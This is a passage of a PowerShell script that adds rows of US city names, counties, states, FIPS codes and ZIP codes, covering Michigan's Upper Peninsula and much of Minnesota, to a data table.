$Cities.Rows.Add("Seney","Schoolcraft","Michigan","MI","26","49883") + $null = $Cities.Rows.Add("Shingleton","Alger","Michigan","MI","26","49884") + $null = $Cities.Rows.Add("Skandia","Marquette","Michigan","MI","26","49885") + $null = $Cities.Rows.Add("Spalding","Menominee","Michigan","MI","26","49886") + $null = $Cities.Rows.Add("Stephenson","Menominee","Michigan","MI","26","49887") + $null = $Cities.Rows.Add("Trenary","Alger","Michigan","MI","26","49891") + $null = $Cities.Rows.Add("Vulcan","Dickinson","Michigan","MI","26","49892") + $null = $Cities.Rows.Add("Wallace","Menominee","Michigan","MI","26","49893") + $null = $Cities.Rows.Add("Wells","Delta","Michigan","MI","26","49894") + $null = $Cities.Rows.Add("Wetmore","Alger","Michigan","MI","26","49895") + $null = $Cities.Rows.Add("Wilson","Menominee","Michigan","MI","26","49896") + $null = $Cities.Rows.Add("Zcta 498hh","Alger","Michigan","MI","26","498HH") + $null = $Cities.Rows.Add("Zcta 498xx","Schoolcraft","Michigan","MI","26","498XX") + $null = $Cities.Rows.Add("Ahmeek","Keweenaw","Michigan","MI","26","49901") + $null = $Cities.Rows.Add("Alpha","Iron","Michigan","MI","26","49902") + $null = $Cities.Rows.Add("Amasa","Iron","Michigan","MI","26","49903") + $null = $Cities.Rows.Add("Atlantic mine","Houghton","Michigan","MI","26","49905") + $null = $Cities.Rows.Add("Keweenaw bay","Baraga","Michigan","MI","26","49908") + $null = $Cities.Rows.Add("Bergland","Ontonagon","Michigan","MI","26","49910") + $null = $Cities.Rows.Add("Bessemer","Gogebic","Michigan","MI","26","49911") + $null = $Cities.Rows.Add("Bruce crossing","Ontonagon","Michigan","MI","26","49912") + $null = $Cities.Rows.Add("Laurium","Houghton","Michigan","MI","26","49913") + $null = $Cities.Rows.Add("Caspian","Iron","Michigan","MI","26","49915") + $null = $Cities.Rows.Add("Chassell","Houghton","Michigan","MI","26","49916") + $null = $Cities.Rows.Add("Copper city","Houghton","Michigan","MI","26","49917") + $null = $Cities.Rows.Add("Copper harbor","Keweenaw","Michigan","MI","26","49918") + $null = $Cities.Rows.Add("Covington","Baraga","Michigan","MI","26","49919") + $null = $Cities.Rows.Add("Crystal falls","Iron","Michigan","MI","26","49920") + $null = $Cities.Rows.Add("Dodgeville","Houghton","Michigan","MI","26","49921") + $null = $Cities.Rows.Add("Dollar bay","Houghton","Michigan","MI","26","49922") + $null = $Cities.Rows.Add("Ewen","Ontonagon","Michigan","MI","26","49925") + $null = $Cities.Rows.Add("Gaastra","Iron","Michigan","MI","26","49927") + $null = $Cities.Rows.Add("Greenland","Ontonagon","Michigan","MI","26","49929") + $null = $Cities.Rows.Add("Hancock","Houghton","Michigan","MI","26","49930") + $null = $Cities.Rows.Add("Houghton","Houghton","Michigan","MI","26","49931") + $null = $Cities.Rows.Add("Hubbell","Houghton","Michigan","MI","26","49934") + $null = $Cities.Rows.Add("Iron river","Iron","Michigan","MI","26","49935") + $null = $Cities.Rows.Add("Ironwood","Gogebic","Michigan","MI","26","49938") + $null = $Cities.Rows.Add("Kearsarge","Houghton","Michigan","MI","26","49942") + $null = $Cities.Rows.Add("Gay","Houghton","Michigan","MI","26","49945") + $null = $Cities.Rows.Add("Lanse","Baraga","Michigan","MI","26","49946") + $null = $Cities.Rows.Add("Marenisco","Gogebic","Michigan","MI","26","49947") + $null = $Cities.Rows.Add("Mass city","Ontonagon","Michigan","MI","26","49948") + $null = $Cities.Rows.Add("Eagle harbor","Keweenaw","Michigan","MI","26","49950") + $null = $Cities.Rows.Add("Nisula","Houghton","Michigan","MI","26","49952") + $null = $Cities.Rows.Add("Ontonagon","Ontonagon","Michigan","MI","26","49953") + $null = $Cities.Rows.Add("Painesdale","Houghton","Michigan","MI","26","49955") + $null = $Cities.Rows.Add("Pelkie","Houghton","Michigan","MI","26","49958") + $null = $Cities.Rows.Add("Ramsay","Gogebic","Michigan","MI","26","49959") + $null = $Cities.Rows.Add("Rockland","Ontonagon","Michigan","MI","26","49960") + $null = $Cities.Rows.Add("Sidnaw","Houghton","Michigan","MI","26","49961") + $null = $Cities.Rows.Add("Skanee","Baraga","Michigan","MI","26","49962") + $null = $Cities.Rows.Add("South range","Houghton","Michigan","MI","26","49963") + $null = $Cities.Rows.Add("Stambaugh","Iron","Michigan","MI","26","49964") + $null = $Cities.Rows.Add("Toivola","Houghton","Michigan","MI","26","49965") + $null = $Cities.Rows.Add("Trout creek","Ontonagon","Michigan","MI","26","49967") + $null = $Cities.Rows.Add("Wakefield","Gogebic","Michigan","MI","26","49968") + $null = $Cities.Rows.Add("Watersmeet","Gogebic","Michigan","MI","26","49969") + $null = $Cities.Rows.Add("Watton","Baraga","Michigan","MI","26","49970") + $null = $Cities.Rows.Add("White pine","Ontonagon","Michigan","MI","26","49971") + $null = $Cities.Rows.Add("Zcta 499hh","Baraga","Michigan","MI","26","499HH") + $null = $Cities.Rows.Add("Zcta 499xx","Houghton","Michigan","MI","26","499XX") + $null = $Cities.Rows.Add("Afton","Washington","Minnesota","MN","27","55001") + $null = $Cities.Rows.Add("Bayport","Washington","Minnesota","MN","27","55003") + $null = $Cities.Rows.Add("East bethel","Anoka","Minnesota","MN","27","55005") + $null = $Cities.Rows.Add("Braham","Isanti","Minnesota","MN","27","55006") + $null = $Cities.Rows.Add("Quamba","Kanabec","Minnesota","MN","27","55007") + $null = $Cities.Rows.Add("Cambridge","Isanti","Minnesota","MN","27","55008") + $null = $Cities.Rows.Add("Cannon falls","Goodhue","Minnesota","MN","27","55009") + $null = $Cities.Rows.Add("Castle rock","Dakota","Minnesota","MN","27","55010") + $null = $Cities.Rows.Add("Cedar east bethe","Anoka","Minnesota","MN","27","55011") + $null = $Cities.Rows.Add("Center city","Chisago","Minnesota","MN","27","55012") + $null = $Cities.Rows.Add("Chisago city","Chisago","Minnesota","MN","27","55013") + $null = $Cities.Rows.Add("Circle pines","Anoka","Minnesota","MN","27","55014") + $null = $Cities.Rows.Add("Cottage grove","Washington","Minnesota","MN","27","55016") + $null = $Cities.Rows.Add("Dalbo","Isanti","Minnesota","MN","27","55017") + $null = $Cities.Rows.Add("Stanton","Goodhue","Minnesota","MN","27","55018") + $null = $Cities.Rows.Add("Dundas","Rice","Minnesota","MN","27","55019") + $null = $Cities.Rows.Add("Elko","Scott","Minnesota","MN","27","55020") + $null = $Cities.Rows.Add("Faribault","Rice","Minnesota","MN","27","55021") + $null = $Cities.Rows.Add("Farmington","Dakota","Minnesota","MN","27","55024") + $null = $Cities.Rows.Add("Forest lake","Washington","Minnesota","MN","27","55025") + $null = $Cities.Rows.Add("Frontenac","Goodhue","Minnesota","MN","27","55026") + $null = $Cities.Rows.Add("Goodhue","Goodhue","Minnesota","MN","27","55027") + $null = $Cities.Rows.Add("Grasston","Pine","Minnesota","MN","27","55030") + $null = $Cities.Rows.Add("Hampton","Dakota","Minnesota","MN","27","55031") + $null = $Cities.Rows.Add("Harris","Chisago","Minnesota","MN","27","55032") + $null = $Cities.Rows.Add("Welch","Dakota","Minnesota","MN","27","55033") + $null = $Cities.Rows.Add("Henriette","Pine","Minnesota","MN","27","55036") + $null = $Cities.Rows.Add("Hinckley","Pine","Minnesota","MN","27","55037") + $null = $Cities.Rows.Add("Centerville","Washington","Minnesota","MN","27","55038") + $null = $Cities.Rows.Add("Isanti","Isanti","Minnesota","MN","27","55040") + $null = $Cities.Rows.Add("Lake city","Wabasha","Minnesota","MN","27","55041") + $null = $Cities.Rows.Add("Lake elmo","Washington","Minnesota","MN","27","55042") + $null = $Cities.Rows.Add("Lakeland","Washington","Minnesota","MN","27","55043") + $null = $Cities.Rows.Add("Lakeville","Dakota","Minnesota","MN","27","55044") + $null = $Cities.Rows.Add("Lindstrom","Chisago","Minnesota","MN","27","55045") + $null = $Cities.Rows.Add("Veseli","Rice","Minnesota","MN","27","55046") + $null = $Cities.Rows.Add("Marine on saint","Washington","Minnesota","MN","27","55047") + $null = $Cities.Rows.Add("Medford","Steele","Minnesota","MN","27","55049") + $null = $Cities.Rows.Add("Mora","Kanabec","Minnesota","MN","27","55051") + $null = $Cities.Rows.Add("Morristown","Rice","Minnesota","MN","27","55052") + $null = $Cities.Rows.Add("Nerstrand","Rice","Minnesota","MN","27","55053") + $null = $Cities.Rows.Add("Newport","Washington","Minnesota","MN","27","55055") + $null = $Cities.Rows.Add("North branch","Chisago","Minnesota","MN","27","55056") + $null = $Cities.Rows.Add("Northfield","Rice","Minnesota","MN","27","55057") + $null = $Cities.Rows.Add("Owatonna","Steele","Minnesota","MN","27","55060") + $null = $Cities.Rows.Add("Beroun","Pine","Minnesota","MN","27","55063") + $null = $Cities.Rows.Add("Randolph","Dakota","Minnesota","MN","27","55065") + $null = $Cities.Rows.Add("Red wing","Goodhue","Minnesota","MN","27","55066") + $null = $Cities.Rows.Add("Rosemount","Dakota","Minnesota","MN","27","55068") + $null = $Cities.Rows.Add("Rush city","Chisago","Minnesota","MN","27","55069") + $null = $Cities.Rows.Add("Saint francis","Anoka","Minnesota","MN","27","55070") + $null = $Cities.Rows.Add("Saint paul park","Washington","Minnesota","MN","27","55071") + $null = $Cities.Rows.Add("Markville","Pine","Minnesota","MN","27","55072") + $null = $Cities.Rows.Add("Scandia","Washington","Minnesota","MN","27","55073") + $null = $Cities.Rows.Add("Shafer","Chisago","Minnesota","MN","27","55074") + $null = $Cities.Rows.Add("South saint paul","Dakota","Minnesota","MN","27","55075") + $null = $Cities.Rows.Add("Inver grove heig","Dakota","Minnesota","MN","27","55076") + $null = $Cities.Rows.Add("Inver grove heig","Dakota","Minnesota","MN","27","55077") + $null = $Cities.Rows.Add("Stacy","Anoka","Minnesota","MN","27","55079") + $null = $Cities.Rows.Add("Stanchfield","Isanti","Minnesota","MN","27","55080") + $null = $Cities.Rows.Add("Oak park heights","Washington","Minnesota","MN","27","55082") + $null = $Cities.Rows.Add("Taylors falls","Chisago","Minnesota","MN","27","55084") + $null = $Cities.Rows.Add("Vermillion","Dakota","Minnesota","MN","27","55085") + $null = $Cities.Rows.Add("Warsaw","Rice","Minnesota","MN","27","55087") + $null = $Cities.Rows.Add("Webster","Rice","Minnesota","MN","27","55088") + $null = $Cities.Rows.Add("Welch","Goodhue","Minnesota","MN","27","55089") + $null = $Cities.Rows.Add("Willernie","Washington","Minnesota","MN","27","55090") + $null = $Cities.Rows.Add("East bethel","Chisago","Minnesota","MN","27","55092") + $null = $Cities.Rows.Add("Zcta 550hh","Anoka","Minnesota","MN","27","550HH") + $null = $Cities.Rows.Add("Saint paul","Ramsey","Minnesota","MN","27","55101") + $null = $Cities.Rows.Add("Saint paul","Ramsey","Minnesota","MN","27","55102") + $null = $Cities.Rows.Add("Saint paul","Ramsey","Minnesota","MN","27","55103") + $null = $Cities.Rows.Add("Saint paul","Ramsey","Minnesota","MN","27","55104") + $null = $Cities.Rows.Add("Saint paul","Ramsey","Minnesota","MN","27","55105") + $null = $Cities.Rows.Add("Saint paul","Ramsey","Minnesota","MN","27","55106") + $null = $Cities.Rows.Add("West saint paul","Ramsey","Minnesota","MN","27","55107") + $null = $Cities.Rows.Add("Lauderdale","Ramsey","Minnesota","MN","27","55108") + $null = $Cities.Rows.Add("North saint paul","Ramsey","Minnesota","MN","27","55109") + $null = $Cities.Rows.Add("White bear lake","Ramsey","Minnesota","MN","27","55110") + $null = $Cities.Rows.Add("New brighton","Ramsey","Minnesota","MN","27","55112") + $null = $Cities.Rows.Add("Roseville","Ramsey","Minnesota","MN","27","55113") + $null = $Cities.Rows.Add("Saint paul","Ramsey","Minnesota","MN","27","55114") + $null = $Cities.Rows.Add("White bear lake","Washington","Minnesota","MN","27","55115") + $null = $Cities.Rows.Add("Saint paul","Ramsey","Minnesota","MN","27","55116") + $null = $Cities.Rows.Add("Little canada","Ramsey","Minnesota","MN","27","55117") + $null = $Cities.Rows.Add("West saint paul","Dakota","Minnesota","MN","27","55118") + $null = $Cities.Rows.Add("Maplewood","Ramsey","Minnesota","MN","27","55119") + $null = $Cities.Rows.Add("Eagan","Dakota","Minnesota","MN","27","55120") + $null = $Cities.Rows.Add("Eagan","Dakota","Minnesota","MN","27","55121") + $null = $Cities.Rows.Add("Eagan","Dakota","Minnesota","MN","27","55122") + $null = $Cities.Rows.Add("Eagan","Dakota","Minnesota","MN","27","55123") + $null = $Cities.Rows.Add("Apple valley","Dakota","Minnesota","MN","27","55124") + $null = $Cities.Rows.Add("Woodbury","Washington","Minnesota","MN","27","55125") + $null = $Cities.Rows.Add("Shoreview","Ramsey","Minnesota","MN","27","55126") + $null = $Cities.Rows.Add("Vadnais heights","Ramsey","Minnesota","MN","27","55127") + $null = $Cities.Rows.Add("Oakdale","Washington","Minnesota","MN","27","55128") + $null = $Cities.Rows.Add("Zcta 55129","Washington","Minnesota","MN","27","55129") + $null = $Cities.Rows.Add("Mendota","Dakota","Minnesota","MN","27","55150") + $null = $Cities.Rows.Add("Zcta 551hh","Dakota","Minnesota","MN","27","551HH") + $null = $Cities.Rows.Add("Albertville","Wright","Minnesota","MN","27","55301") + $null = $Cities.Rows.Add("Annandale","Wright","Minnesota","MN","27","55302") + $null = $Cities.Rows.Add("Ramsey","Anoka","Minnesota","MN","27","55303") + $null = $Cities.Rows.Add("Ham lake","Anoka","Minnesota","MN","27","55304") + $null = $Cities.Rows.Add("Minnetonka","Hennepin","Minnesota","MN","27","55305") + $null = $Cities.Rows.Add("Burnsville","Dakota","Minnesota","MN","27","55306") + $null = $Cities.Rows.Add("Arlington","Sibley","Minnesota","MN","27","55307") + $null = $Cities.Rows.Add("Becker","Sherburne","Minnesota","MN","27","55308") + $null = $Cities.Rows.Add("Big lake","Sherburne","Minnesota","MN","27","55309") + $null = $Cities.Rows.Add("Bird island","Renville","Minnesota","MN","27","55310") + $null = $Cities.Rows.Add("Maple grove","Hennepin","Minnesota","MN","27","55311") + $null = $Cities.Rows.Add("Brownton","McLeod","Minnesota","MN","27","55312") + $null = $Cities.Rows.Add("Buffalo","Wright","Minnesota","MN","27","55313") + $null = $Cities.Rows.Add("Buffalo lake","Renville","Minnesota","MN","27","55314") + $null = $Cities.Rows.Add("Carver","Carver","Minnesota","MN","27","55315") + $null = $Cities.Rows.Add("Champlin","Hennepin","Minnesota","MN","27","55316") + $null = $Cities.Rows.Add("Chanhassen","Carver","Minnesota","MN","27","55317") + $null = $Cities.Rows.Add("Chaska","Carver","Minnesota","MN","27","55318") + $null = $Cities.Rows.Add("Clear lake","Sherburne","Minnesota","MN","27","55319") + $null = $Cities.Rows.Add("Clearwater","Wright","Minnesota","MN","27","55320") + $null = $Cities.Rows.Add("Cokato","Wright","Minnesota","MN","27","55321") + $null = $Cities.Rows.Add("Cologne","Carver","Minnesota","MN","27","55322") + $null = $Cities.Rows.Add("Darwin","Meeker","Minnesota","MN","27","55324") + $null = $Cities.Rows.Add("Dassel","Meeker","Minnesota","MN","27","55325") + $null = $Cities.Rows.Add("Dayton","Hennepin","Minnesota","MN","27","55327") + $null = $Cities.Rows.Add("Delano","Wright","Minnesota","MN","27","55328") + $null = $Cities.Rows.Add("Eden valley","Stearns","Minnesota","MN","27","55329") + $null = $Cities.Rows.Add("Elk river","Sherburne","Minnesota","MN","27","55330") + $null = $Cities.Rows.Add("Excelsior","Hennepin","Minnesota","MN","27","55331") + $null = $Cities.Rows.Add("Fairfax","Renville","Minnesota","MN","27","55332") + $null = $Cities.Rows.Add("Franklin","Renville","Minnesota","MN","27","55333") + $null = $Cities.Rows.Add("Gaylord","Sibley","Minnesota","MN","27","55334") + $null = $Cities.Rows.Add("Gibbon","Sibley","Minnesota","MN","27","55335") + $null = $Cities.Rows.Add("Glencoe","McLeod","Minnesota","MN","27","55336") + $null = $Cities.Rows.Add("Burnsville","Dakota","Minnesota","MN","27","55337") + $null = $Cities.Rows.Add("Green isle","Sibley","Minnesota","MN","27","55338") + $null = $Cities.Rows.Add("Hamburg","Carver","Minnesota","MN","27","55339") + $null = $Cities.Rows.Add("Hamel","Hennepin","Minnesota","MN","27","55340") + $null = $Cities.Rows.Add("Hanover","Wright","Minnesota","MN","27","55341") + $null = $Cities.Rows.Add("Hector","Renville","Minnesota","MN","27","55342") + $null = $Cities.Rows.Add("Eden prairie","Hennepin","Minnesota","MN","27","55343") + $null = $Cities.Rows.Add("Eden prairie","Hennepin","Minnesota","MN","27","55344") + $null = $Cities.Rows.Add("Minnetonka","Hennepin","Minnesota","MN","27","55345") + $null = $Cities.Rows.Add("Eden prairie","Hennepin","Minnesota","MN","27","55346") + $null = $Cities.Rows.Add("Eden prairie","Hennepin","Minnesota","MN","27","55347") + $null = $Cities.Rows.Add("Howard lake","Wright","Minnesota","MN","27","55349") + $null = $Cities.Rows.Add("Hutchinson","McLeod","Minnesota","MN","27","55350") + $null = $Cities.Rows.Add("Jordan","Scott","Minnesota","MN","27","55352") + $null = $Cities.Rows.Add("Kimball","Stearns","Minnesota","MN","27","55353") + $null = $Cities.Rows.Add("Lester prairie","McLeod","Minnesota","MN","27","55354") + $null = $Cities.Rows.Add("Litchfield","Meeker","Minnesota","MN","27","55355") + $null = $Cities.Rows.Add("Long lake","Hennepin","Minnesota","MN","27","55356") + $null = $Cities.Rows.Add("Loretto","Hennepin","Minnesota","MN","27","55357") + $null = $Cities.Rows.Add("Maple lake","Wright","Minnesota","MN","27","55358") + $null = $Cities.Rows.Add("Maple plain","Hennepin","Minnesota","MN","27","55359") + $null = $Cities.Rows.Add("Mayer","Carver","Minnesota","MN","27","55360") + $null = $Cities.Rows.Add("Monticello","Wright","Minnesota","MN","27","55362") + $null = $Cities.Rows.Add("Montrose","Wright","Minnesota","MN","27","55363") + $null = $Cities.Rows.Add("Mound","Hennepin","Minnesota","MN","27","55364") + $null = $Cities.Rows.Add("New germany","Carver","Minnesota","MN","27","55367") + $null = $Cities.Rows.Add("Norwood","Carver","Minnesota","MN","27","55368") + $null = $Cities.Rows.Add("Maple grove","Hennepin","Minnesota","MN","27","55369") + $null = $Cities.Rows.Add("Plato","McLeod","Minnesota","MN","27","55370") + $null = $Cities.Rows.Add("Princeton","Mille Lacs","Minnesota","MN","27","55371") + $null = $Cities.Rows.Add("Prior lake","Scott","Minnesota","MN","27","55372") + $null = $Cities.Rows.Add("Rockford","Wright","Minnesota","MN","27","55373") + $null = $Cities.Rows.Add("Rogers","Hennepin","Minnesota","MN","27","55374") + $null = $Cities.Rows.Add("Bible college","Hennepin","Minnesota","MN","27","55375") + $null = $Cities.Rows.Add("Saint michael","Wright","Minnesota","MN","27","55376") + $null = $Cities.Rows.Add("Savage","Scott","Minnesota","MN","27","55378") + $null = $Cities.Rows.Add("Shakopee","Scott","Minnesota","MN","27","55379") + $null = $Cities.Rows.Add("Silver lake","McLeod","Minnesota","MN","27","55381") + $null = $Cities.Rows.Add("South haven","Stearns","Minnesota","MN","27","55382") + $null = $Cities.Rows.Add("Spring park","Hennepin","Minnesota","MN","27","55384") + $null = $Cities.Rows.Add("Stewart","McLeod","Minnesota","MN","27","55385") + $null = $Cities.Rows.Add("Victoria","Carver","Minnesota","MN","27","55386") + $null = $Cities.Rows.Add("Waconia","Carver","Minnesota","MN","27","55387") + $null = $Cities.Rows.Add("Watertown","Carver","Minnesota","MN","27","55388") + $null = $Cities.Rows.Add("Watkins","Meeker","Minnesota","MN","27","55389") + $null = $Cities.Rows.Add("Waverly","Wright","Minnesota","MN","27","55390") + $null = $Cities.Rows.Add("Wayzata","Hennepin","Minnesota","MN","27","55391") + $null = $Cities.Rows.Add("Winsted","McLeod","Minnesota","MN","27","55395") + $null = $Cities.Rows.Add("Winthrop","Sibley","Minnesota","MN","27","55396") + $null = $Cities.Rows.Add("Young america","Carver","Minnesota","MN","27","55397") + $null = $Cities.Rows.Add("Zimmerman","Sherburne","Minnesota","MN","27","55398") + $null = $Cities.Rows.Add("Zcta 553hh","Anoka","Minnesota","MN","27","553HH") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55401") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55402") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55403") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55404") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55405") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55406") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55407") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55408") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55409") + $null = $Cities.Rows.Add("Edina","Hennepin","Minnesota","MN","27","55410") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55411") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55412") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55413") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55414") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55415") + $null = $Cities.Rows.Add("Saint louis park","Hennepin","Minnesota","MN","27","55416") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55417") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55418") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55419") + $null = $Cities.Rows.Add("Bloomington","Hennepin","Minnesota","MN","27","55420") + $null = $Cities.Rows.Add("Columbia heights","Anoka","Minnesota","MN","27","55421") + $null = $Cities.Rows.Add("Robbinsdale","Hennepin","Minnesota","MN","27","55422") + $null = $Cities.Rows.Add("Richfield","Hennepin","Minnesota","MN","27","55423") + $null = $Cities.Rows.Add("Edina","Hennepin","Minnesota","MN","27","55424") + $null = $Cities.Rows.Add("Bloomington","Hennepin","Minnesota","MN","27","55425") + $null = $Cities.Rows.Add("Saint louis park","Hennepin","Minnesota","MN","27","55426") + $null = $Cities.Rows.Add("Golden valley","Hennepin","Minnesota","MN","27","55427") + $null = $Cities.Rows.Add("Crystal","Hennepin","Minnesota","MN","27","55428") + $null = $Cities.Rows.Add("Brooklyn center","Hennepin","Minnesota","MN","27","55429") + $null = $Cities.Rows.Add("Brooklyn center","Hennepin","Minnesota","MN","27","55430") + $null = $Cities.Rows.Add("Bloomington","Hennepin","Minnesota","MN","27","55431") + $null = $Cities.Rows.Add("Fridley","Anoka","Minnesota","MN","27","55432") + $null = $Cities.Rows.Add("Coon rapids","Anoka","Minnesota","MN","27","55433") + $null = $Cities.Rows.Add("Blaine","Anoka","Minnesota","MN","27","55434") + $null = $Cities.Rows.Add("Edina","Hennepin","Minnesota","MN","27","55435") + $null = $Cities.Rows.Add("Edina","Hennepin","Minnesota","MN","27","55436") + $null = $Cities.Rows.Add("Bloomington","Hennepin","Minnesota","MN","27","55437") + $null = $Cities.Rows.Add("Bloomington","Hennepin","Minnesota","MN","27","55438") + $null = $Cities.Rows.Add("Edina","Hennepin","Minnesota","MN","27","55439") + $null = $Cities.Rows.Add("Plymouth","Hennepin","Minnesota","MN","27","55441") + $null = $Cities.Rows.Add("Plymouth","Hennepin","Minnesota","MN","27","55442") + $null = $Cities.Rows.Add("Brooklyn center","Hennepin","Minnesota","MN","27","55443") + $null = $Cities.Rows.Add("Brooklyn center","Hennepin","Minnesota","MN","27","55444") + $null = $Cities.Rows.Add("Brooklyn park","Hennepin","Minnesota","MN","27","55445") + $null = $Cities.Rows.Add("Plymouth","Hennepin","Minnesota","MN","27","55446") + $null = $Cities.Rows.Add("Plymouth","Hennepin","Minnesota","MN","27","55447") + $null = $Cities.Rows.Add("Coon rapids","Anoka","Minnesota","MN","27","55448") + $null = $Cities.Rows.Add("Blaine","Anoka","Minnesota","MN","27","55449") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55450") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55454") + $null = $Cities.Rows.Add("Minneapolis","Hennepin","Minnesota","MN","27","55455") + $null = $Cities.Rows.Add("Zcta 554hh","Anoka","Minnesota","MN","27","554HH") + $null = $Cities.Rows.Add("Beaver bay","Lake","Minnesota","MN","27","55601") + $null = $Cities.Rows.Add("Brimson","St. Louis","Minnesota","MN","27","55602") + $null = $Cities.Rows.Add("Finland","Lake","Minnesota","MN","27","55603") + $null = $Cities.Rows.Add("Grand marais","Cook","Minnesota","MN","27","55604") + $null = $Cities.Rows.Add("Grand portage","Cook","Minnesota","MN","27","55605") + $null = $Cities.Rows.Add("Hovland","Cook","Minnesota","MN","27","55606") + $null = $Cities.Rows.Add("Isabella","Lake","Minnesota","MN","27","55607") + $null = $Cities.Rows.Add("Knife river","Lake","Minnesota","MN","27","55609") + $null = $Cities.Rows.Add("Lutsen","Cook","Minnesota","MN","27","55612") + $null = $Cities.Rows.Add("Schroeder","Cook","Minnesota","MN","27","55613") + $null = $Cities.Rows.Add("Little marais","Lake","Minnesota","MN","27","55614") + $null = $Cities.Rows.Add("Tofte","Cook","Minnesota","MN","27","55615") + $null = $Cities.Rows.Add("Two harbors","Lake","Minnesota","MN","27","55616") + $null = $Cities.Rows.Add("Zcta 556hh","Cook","Minnesota","MN","27","556HH") + $null = $Cities.Rows.Add("Zcta 556xx","Lake","Minnesota","MN","27","556XX") + $null = $Cities.Rows.Add("Alborn","St. Louis","Minnesota","MN","27","55702") + $null = $Cities.Rows.Add("Angora","St. Louis","Minnesota","MN","27","55703") + $null = $Cities.Rows.Add("Askov","Pine","Minnesota","MN","27","55704") + $null = $Cities.Rows.Add("Aurora","St. Louis","Minnesota","MN","27","55705") + $null = $Cities.Rows.Add("Babbitt","St. Louis","Minnesota","MN","27","55706") + $null = $Cities.Rows.Add("Barnum","Carlton","Minnesota","MN","27","55707") + $null = $Cities.Rows.Add("Biwabik","St. Louis","Minnesota","MN","27","55708") + $null = $Cities.Rows.Add("Bovey","Itasca","Minnesota","MN","27","55709") + $null = $Cities.Rows.Add("Britt","St. Louis","Minnesota","MN","27","55710") + $null = $Cities.Rows.Add("Brookston","St. Louis","Minnesota","MN","27","55711") + $null = $Cities.Rows.Add("Bruno","Pine","Minnesota","MN","27","55712") + $null = $Cities.Rows.Add("Buhl","St. Louis","Minnesota","MN","27","55713") + $null = $Cities.Rows.Add("Calumet","Itasca","Minnesota","MN","27","55716") + $null = $Cities.Rows.Add("Canyon","St. Louis","Minnesota","MN","27","55717") + $null = $Cities.Rows.Add("Carlton","Carlton","Minnesota","MN","27","55718") + $null = $Cities.Rows.Add("Chisholm","St. Louis","Minnesota","MN","27","55719") + $null = $Cities.Rows.Add("Cloquet","Carlton","Minnesota","MN","27","55720") + $null = $Cities.Rows.Add("Cohasset","Itasca","Minnesota","MN","27","55721") + $null = $Cities.Rows.Add("Coleraine","Itasca","Minnesota","MN","27","55722") + $null = $Cities.Rows.Add("Cook","St. Louis","Minnesota","MN","27","55723") + $null = $Cities.Rows.Add("Kelsey","St. Louis","Minnesota","MN","27","55724") + $null = $Cities.Rows.Add("Crane lake","St. Louis","Minnesota","MN","27","55725") + $null = $Cities.Rows.Add("Cromwell","Carlton","Minnesota","MN","27","55726") + $null = $Cities.Rows.Add("Ely","St. Louis","Minnesota","MN","27","55731") + $null = $Cities.Rows.Add("Embarrass","St. Louis","Minnesota","MN","27","55732") + $null = $Cities.Rows.Add("Esko","Carlton","Minnesota","MN","27","55733") + $null = $Cities.Rows.Add("Eveleth","St. Louis","Minnesota","MN","27","55734") + $null = $Cities.Rows.Add("Finlayson","Pine","Minnesota","MN","27","55735") + $null = $Cities.Rows.Add("Floodwood","St. Louis","Minnesota","MN","27","55736") + $null = $Cities.Rows.Add("Forbes","St. Louis","Minnesota","MN","27","55738") + $null = $Cities.Rows.Add("Gilbert","St. Louis","Minnesota","MN","27","55741") + $null = $Cities.Rows.Add("Goodland","Itasca","Minnesota","MN","27","55742") + $null = $Cities.Rows.Add("La prairie","Itasca","Minnesota","MN","27","55744") + $null = $Cities.Rows.Add("Hibbing","St. Louis","Minnesota","MN","27","55746") + $null = $Cities.Rows.Add("Hill city","Aitkin","Minnesota","MN","27","55748") + $null = $Cities.Rows.Add("Holyoke","Carlton","Minnesota","MN","27","55749") + $null = $Cities.Rows.Add("Hoyt lakes","St. Louis","Minnesota","MN","27","55750") + $null = $Cities.Rows.Add("Iron","St. Louis","Minnesota","MN","27","55751") + $null = $Cities.Rows.Add("Jacobson","Aitkin","Minnesota","MN","27","55752") + $null = $Cities.Rows.Add("Keewatin","Itasca","Minnesota","MN","27","55753") + $null = $Cities.Rows.Add("Kerrick","Pine","Minnesota","MN","27","55756") + $null = $Cities.Rows.Add("Kettle river","Carlton","Minnesota","MN","27","55757") + $null = $Cities.Rows.Add("Kinney","St. Louis","Minnesota","MN","27","55758") + $null = $Cities.Rows.Add("Mc gregor","Aitkin","Minnesota","MN","27","55760") + $null = $Cities.Rows.Add("Makinen","St. Louis","Minnesota","MN","27","55763") + $null = $Cities.Rows.Add("Marble","Itasca","Minnesota","MN","27","55764") + $null = $Cities.Rows.Add("Meadowlands","St. Louis","Minnesota","MN","27","55765") + $null = $Cities.Rows.Add("Moose lake","Carlton","Minnesota","MN","27","55767") + $null = $Cities.Rows.Add("Mountain iron","St. Louis","Minnesota","MN","27","55768") + $null = $Cities.Rows.Add("Nashwauk","Itasca","Minnesota","MN","27","55769") + $null = $Cities.Rows.Add("Buyck","St. Louis","Minnesota","MN","27","55771") + $null = $Cities.Rows.Add("Pengilly","Itasca","Minnesota","MN","27","55775") + $null = $Cities.Rows.Add("Saginaw","St. Louis","Minnesota","MN","27","55779") + $null = 